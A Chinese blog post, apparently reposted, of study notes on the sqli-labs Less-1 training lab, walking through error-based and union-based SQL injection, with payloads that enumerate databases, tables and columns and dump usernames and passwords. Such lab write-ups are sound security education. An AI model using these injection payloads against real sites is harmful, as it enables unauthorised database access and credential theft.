sqli-labs less1 学习笔记
来源:互联网 发布:在日本做生意知乎 编辑:程序博客网 时间:2024/05/22 02:25
- 初学的时候我们可以在源代码中$sql下一句语句写以下php语句
echo "你的 sql 语句是:".$sql."<br>";
- 先在URL栏中输入?id=1
- 尝试在1后面加' 发现报错
- 从上述错误当中,我们可以看到提交到sql中的1'在经过sql语句构造后形成 '1'' LIMIT 0,1,多加了一个 ' 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何将多余的 ' 去掉呢?
尝试 'or 1=1--+
此时构造的sql语句就成了
Select ****** where id='1'or 1=1--+' LIMIT 0,1 发现正常返回数据
那么下面尝试union注入 我们先看一下字段数有多少 。因为union的作用是将两个sql语句进行联合。union前后的两个sql语句的选择列数要相同才可以。Union all与union 的区别是增加了去重的功能。 输入 'order by --+ 发现可以返回 'order by 4--+出现下面的错误,于是我们知道字段数有三个。
当id的数据在数据库中不存在时,(此时我们可以id=-1,两个sql语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的union 的数据。 输入
-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1 爆数据库
- 输入-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
爆security数据库的数据表
输入 -1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ 爆users列表
-1'union select 1,username,password from users where id=2--+ LIMIT 0,1 爆数据
- 成功完成注入
阅读全文
0 0
- sqli-labs less1 学习笔记
- Sqli-labs之Less1-10
- SQLi-Labs学习笔记
- 通过sqli-labs学习sql注入——基础挑战之less1-10
- SQLi-Labs 学习笔记(Less 1-10)
- SQLi-Labs 学习笔记(Less 11-20)
- SQLi-Labs 学习笔记(Less 21-30)
- SQLi-Labs 学习笔记(Less 31-40)
- SQLi-Labs 学习笔记(Less 41-50)
- SQLi-Labs 学习笔记(Less 51-65)
- sqli-labs学习教程(一)
- sqli-labs学习教程(二)
- sqli-labs学习教程(三)
- sqli-labs学习教程(五)
- sqli-labs学习教程(六)
- sqli-labs学习教程(七)
- 学习完sqli-labs总结
- Sqli-labs学习第一题
- 世界医疗机器人大会将在深举办,亮点抢先看
- PPTV聚力破解版SVIP年费v7.0.2
- 坚果智能影院全球首家旗舰店正式开业 10分钟首单售出
- 微软安全测试新玩法:用 AI 问答发掘漏洞
- 面对AI的羁绊,你选择做无用之人还是把握自己命运?
- sqli-labs less1 学习笔记
- 通用文件筛选工具(批量查询按行存储的文本文件,并导入EXCEL表中)
- 在服务器上创建目录
- 360浏览器中页面打开如何默认极速模式
- 3000元档热销续航冠军 vivo X7Plus很放肆
- 预告:按不动的 iPhone Home键和了不起的“振动” | 硬创公开课
- php验证码
- Win10安装python2.7.13和Django-1.11.4
- ELF loader